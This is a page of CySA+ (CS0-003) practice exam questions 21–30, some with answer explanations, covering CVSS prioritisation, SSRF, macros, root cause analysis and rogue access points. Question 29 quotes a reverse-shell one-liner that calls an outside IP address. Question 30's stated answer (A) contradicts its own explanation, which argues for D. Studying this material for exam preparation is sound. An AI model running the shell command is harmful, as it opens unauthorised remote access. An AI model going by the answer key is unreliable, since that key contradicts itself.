Free CompTIA CS0-003 Übungsprüfungen - Seite 3 von 17

Question #21

A vulnerability scan of a web server that is exposed to the internet was recently completed.

A security analyst is reviewing the resulting vector strings:

Vulnerability 1: CVSS: 3.0/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: L/A: L

Vulnerability 2: CVSS: 3.0/AV: L/AC: H/PR: N/UI: N/S: U/C: L/I: L/A: H

Vulnerability 3: CVSS: 3.0/AV: A/AC: H/PR: L/UI: R/S: U/C: L/I: H/A: L

Vulnerability 4: CVSS: 3.0/AV: P/AC: L/PR: H/UI: N/S: U/C: H/I: N/A: L

Which of the following vulnerabilities should be patched first?

A . Vulnerability 1
B . Vulnerability 2
C . Vulnerability 3
D . Vulnerability 4

Lösung einblenden Lösung ausblenden

Question #22

A security analyst noticed the following entry on a web server log:

Warning: fopen (http://127.0.0.1:16) : failed to open stream:

Connection refused in /hj/var/www/showimage.php on line 7

Which of the following malicious activities was most likely attempted?

A . XSS
B . CSRF
C . SSRF
D . RCE

Lösung einblenden Lösung ausblenden

Question #23

While observing several host machines, a security analyst notices a program is overwriting data to a buffer.

Which of the following controls will best mitigate this issue?

A . Data execution prevention
B . Output encoding
C . Prepared statements
D . Parameterized queries

Lösung einblenden Lösung ausblenden

Question #24

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

表格

描述已自动生成

Which of the following has most likely occurred?

A . An Office document with a malicious macro was opened.
B . A credential-stealing website was visited.
C . A phishing link in an email was clicked
D . A web browser vulnerability was exploited.

Lösung einblenden Lösung ausblenden

Richtige Antwort: A
A

Explanation:

An Office document with a malicious macro was opened is the most likely explanation for the suspicious activity on the company laptop, as it reflects the common technique of using macros to execute PowerShell commands that download and run malware. A macro is a piece of code that can automate tasks or perform actions in an Office document, such as a Word file or an Excel spreadsheet. Macros can be useful and legitimate, but they can also be abused by threat actors to deliver malware or perform malicious actions on the system. A malicious macro can be embedded in an Office document that is sent as an attachment in a phishing email or hosted on a compromised website. When the user opens the document, they may be prompted to enable macros or content, which will trigger the execution of the malicious code. The malicious macro can then use PowerShell, which is a scripting language and command-line shell that is built into Windows, to perform various tasks, such as downloading and running malware from a remote URL, bypassing security controls, or establishing persistence on the system. The log excerpt shows that PowerShell was used to download a string from a URL using the WebClient.DownloadString method, which is a common way to fetch and execute malicious code from the internet. The log also shows that PowerShell was used to invoke an expression (iex) that contains obfuscated code, which is another common way to evade detection and analysis. The other options are not as likely as an Office document with a malicious macro was opened, as they do not match the evidence in the log excerpt. A credential-stealing website was visited is possible, but it does not explain why PowerShell was used to download and execute code from a URL. A phishing link in an email was clicked is also possible, but it does not explain what happened after the link was clicked or how PowerShell was involved. A web browser vulnerability was exploited is unlikely, as it does not explain why PowerShell was used to download and execute code from a URL.

Question #25

A SOC receives several alerts indicating user accounts are connecting to the company’s identity provider through non-secure communications. User credentials for accessing sensitive, business-critical systems could be exposed.

Which of the following logs should the SOC use when determining malicious intent?

A . DNS
B . tcpdump
C . Directory
D . IDS

Lösung einblenden Lösung ausblenden

Question #26

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation.

Which of the following vulnerabilities should have the highest priority for the mitigation process?

A . A vulnerability that has related threats and loCs, targeting a different industry
B . A vulnerability that is related to a specific adversary campaign, with loCs found in the SIEM
C . A vulnerability that has no adversaries using it or associated loCs
D . A vulnerability that is related to an isolated system, with no loCs

Lösung einblenden Lösung ausblenden

Question #27

The Chief Executive Officer (CEO) has notified that a confidential trade secret has been compromised.

Which of the following communication plans should the CEO initiate?

A . Alert department managers to speak privately with affected staff.
B . Schedule a press release to inform other service provider customers of the compromise.
C . Disclose to all affected parties in the Chief Operating Officer for discussion and resolution.
D . Verify legal notification requirements of PII and SPII in the legal and human resource departments.

Lösung einblenden Lösung ausblenden

Question #28

Which of the following describes the best reason for conducting a root cause analysis?

A . The root cause analysis ensures that proper timelines were documented.
B . The root cause analysis allows the incident to be properly documented for reporting.
C . The root cause analysis develops recommendations to improve the process.
D . The root cause analysis identifies the contributing items that facilitated the event

Lösung einblenden Lösung ausblenden

Richtige Antwort: D
D

Explanation:

The root cause analysis identifies the contributing items that facilitated the event is the best reason for conducting a root cause analysis, as it reflects the main goal and benefit of this problem-solving approach. A root cause analysis (RCA) is a process of discovering the root causes of problems in order to identify appropriate solutions. A root cause is the core issue or factor that sets in motion the entire cause-and-effect chain that leads to the problem. A root cause analysis assumes that it is more effective to systematically prevent and solve underlying issues rather than just treating symptoms or putting out fires. A root cause analysis can be performed using various methods, tools, and techniques that help to uncover the causes of problems, such as events and causal factor analysis, change analysis, barrier analysis, or fishbone diagrams. A root cause analysis can help to improve quality, performance, safety, or efficiency by finding and eliminating the sources of problems. The other options are not as accurate as the root cause analysis identifies the contributing items that facilitated the event, as they do not capture the essence or value of conducting a root cause analysis. The root cause analysis ensures that proper timelines were documented is a possible outcome or benefit of conducting a root cause analysis, but it is not the best reason for doing so. Documenting timelines can help to establish the sequence of events and actions that led to the problem, but it does not necessarily identify or address the root causes. The root cause analysis allows the incident to be properly documented for reporting is also a possible outcome or benefit of conducting a root cause analysis, but it is not the best reason for doing so. Documenting and reporting incidents can help to communicate and share information about problems and solutions, but it does not necessarily identify or address the root causes. The root cause analysis develops recommendations to improve the process is another possible outcome or benefit of conducting a root cause analysis, but it is not the best reason for doing so. Developing recommendations can help to implement solutions and prevent future problems, but it does not necessarily identify or address the root causes.

Question #29

A security analyst detects an exploit attempt containing the following command:

sh -i >& /dev/udp/10.1.1.1/4821 0>$l

Which of the following is being attempted?

A . RCE
B . Reverse shell
C . XSS
D . SQL injection

Lösung einblenden Lösung ausblenden

Question #30

During a recent site survey. an analyst discovered a rogue wireless access point on the network.

Which of the following actions should be taken first to protect the network while preserving evidence?

A . Run a packet sniffer to monitor traffic to and from the access point.
B . Connect to the access point and examine its log files.
C . Identify who is connected to the access point and attempt to find the attacker.
D . Disconnect the access point from the network

Lösung einblenden Lösung ausblenden

Richtige Antwort: A
A

Explanation:

The correct answer is D. Disconnect the access point from the network.

A rogue access point is a wireless access point that has been installed on a network without the authorization or knowledge of the network administrator. A rogue access point can pose a serious security risk, as it can allow unauthorized users to access the network, intercept network traffic, or launch attacks against the network or its devices1234.

The first action that should be taken to protect the network while preserving evidence is to disconnect the rogue access point from the network. This will prevent any further damage or compromise of the network by blocking the access point from communicating with other devices or users. Disconnecting the rogue access point will also preserve its state and configuration, which can be useful for forensic analysis and investigation. Disconnecting the rogue access point can be done physically by unplugging it from the network port or wirelessly by disabling its radio frequency5. The other options are not the best actions to take first, as they may not protect the network or preserve evidence effectively.

Option A is not the best action to take first, as running a packet sniffer to monitor traffic to and from the access point may not stop the rogue access point from causing harm to the network. A packet sniffer is a tool that captures and analyzes network packets, which are units of data that travel across a network. A packet sniffer can be useful for identifying and troubleshooting network problems, but it may not be able to prevent or block malicious traffic from a rogue access point. Moreover, running a packet sniffer may require additional time and resources, which could delay the response and mitigation of the incident5.

Option B is not the best action to take first, as connecting to the access point and examining its log files may not protect the network or preserve evidence. Connecting to the access point may expose the analyst’s device or credentials to potential attacks or compromise by the rogue access point. Examining its log files may provide some information about the origin and activity of the rogue access point, but it may also alter or delete some evidence that could be useful for forensic analysis and investigation. Furthermore, connecting to the access point and examining its log files may not prevent or stop the rogue access point from continuing to harm the network5.

Option C is not the best action to take first, as identifying who is connected to the access point and attempting to find the attacker may not protect the network or preserve evidence. Identifying who is connected to the access point may require additional tools or techniques, such as scanning for wireless devices or analyzing network traffic, which could take time and resources away from responding and mitigating the incident. Attempting to find the attacker may also be difficult or impossible, as the attacker may use various methods to hide their identity or location, such as encryption, spoofing, or proxy servers. Moreover, identifying who is connected to the access point and attempting to find the attacker may not prevent or stop the rogue access point from causing further damage or compromise to the network5.

Reference: 1 CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives

2 Cybersecurity Analyst+ – CompTIA

3 CompTIA CySA+ CS0-002 Certification Study Guide

4 CertMaster Learn for CySA+ Training – CompTIA

5 How to Protect Against Rogue Access Points on Wi-Fi – Byos

6 Wireless Access Point Protection: 5 Steps to Find Rogue Wi-Fi Networks …

7 Rogue Access Point – Techopedia

8 Rogue access point – Wikipedia

9 What is a Rogue Access Point (Rogue AP)? – Contextual Security